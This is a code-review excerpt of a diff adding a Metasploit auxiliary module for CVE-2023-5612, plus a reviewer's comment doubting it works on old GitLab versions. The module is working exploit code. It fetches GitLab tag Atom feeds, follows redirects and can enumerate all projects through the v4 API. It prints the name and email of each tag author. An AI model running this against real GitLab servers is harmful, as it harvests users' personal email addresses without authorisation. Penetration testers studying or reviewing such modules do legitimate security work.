modules/auxiliary/gather/gitlab_tags_rss_feed_email_disclosure.rb

```diff
@@ -0,0 +1,124 @@
+        'Author' => [
+          'n00bhaxor', # msf module
+          'erruquill' # HackerOne Bug Bounty, analysis
+        ],
+        'References' => [
+          [ 'URL', 'https://gitlab.com/gitlab-org/gitlab/-/issues/428441' ],
+          [ 'URL', 'https://hackerone.com/reports/2208790'],
+          [ 'CVE', '2023-5612']
+        ],
+        'DisclosureDate' => '2024-01-25',
+        'Notes' => {
+          'Stability' => [CRASH_SAFE],
+          'Reliability' => [],
+          'SideEffects' => []
+        }
+      )
+    )
+    register_options(
+      [
+        Opt::RPORT(80),
+        OptString.new('TARGETURI', [ true, 'The URI of the GitLab Application', '/']),
+        OptString.new('TARGETPROJECT', [ false, 'Workspace and project to target', nil])
+      ]
+    )
+  end
+
+  def get_contents(tags)
+    vprint_status('Check RSS tags feed for: ' + tags)
+
+    # Tag needs to be lower case, so...
+    tags = "#{tags.split('/')[0]}/#{tags.split('/')[1].downcase}"
+
+    res = send_request_cgi(
+      'uri' => normalize_uri(target_uri.path, tags, '-', 'tags'),
+      'method' => 'GET', 'vars_get' => { 'format' => 'atom' }
+    )
+
+    if res.code == 200
+      xml_res = res.get_xml_document
+
+    # If we receive a 301 it's probably an issue with workspace case-insensitivty
+    elsif res.code == 301 && res['location']
+      new_uri = URI.parse(res['location']).path
+      res = send_request_cgi(
+        'uri' => normalize_uri(new_uri.to_s),
+        'method' => 'GET', 'vars_get' => { 'format' => 'atom' }
+      )
+      xml_res = res.get_xml_document
+
+      # Error out with an unreachable or any other error code
+    else
+      fail_with(Failure::Unreachable, "#{peer} - Could not connect to web service - no response") if res.nil?
+      fail_with(Failure::UnexpectedReply, "#{peer} - Project does not exist or is not public (response code: #{res.code})")
+    end
+
+    # Check to see if there are any tags with authors
+    author_element = 'author'
+    not_found = xml_res.xpath("//xmlns:#{author_element}").empty?
+    if not_found
+      vprint_bad('No tags or authors found')
+      return
+    end
+
+    # Initialze an empty set so we can dedupe authors based on email address
+    # This only dedupes within a project, not the entirety of Gitlab,
+    # so forks of projects may show duplicate email addresses.
+    unique_emails = Set.new
+
+    xml_res.xpath('//xmlns:author').each do |authors|
+      email = authors.at_xpath('xmlns:email').text
+      next if unique_emails.include?(email)
+
+      name = authors.at_xpath('xmlns:name').text
+      print_good("name: #{name}")
+      print_good("e-mail: #{email}")
+      unique_emails << email
+    end
+  end
+
+  def run
+    unless datastore['TARGETPROJECT'].nil?
+      get_contents(datastore['TARGETPROJECT'].to_s)
+      return
+    end
+
+    print_good('Scraping ALL projects...')
+    request = {
+      'uri' => normalize_uri(target_uri.path, '/api/v4/projects'),
```

Comment:
Looks like v4 has been around since 2018: https://gitlab.com/gitlab-org/gitlab/-/commit/e1b25b0fedb5e0a72063e14feff0bde1c93447d7

I'm skeptical that this vuln would even work on something that old due to other urls or url formats changing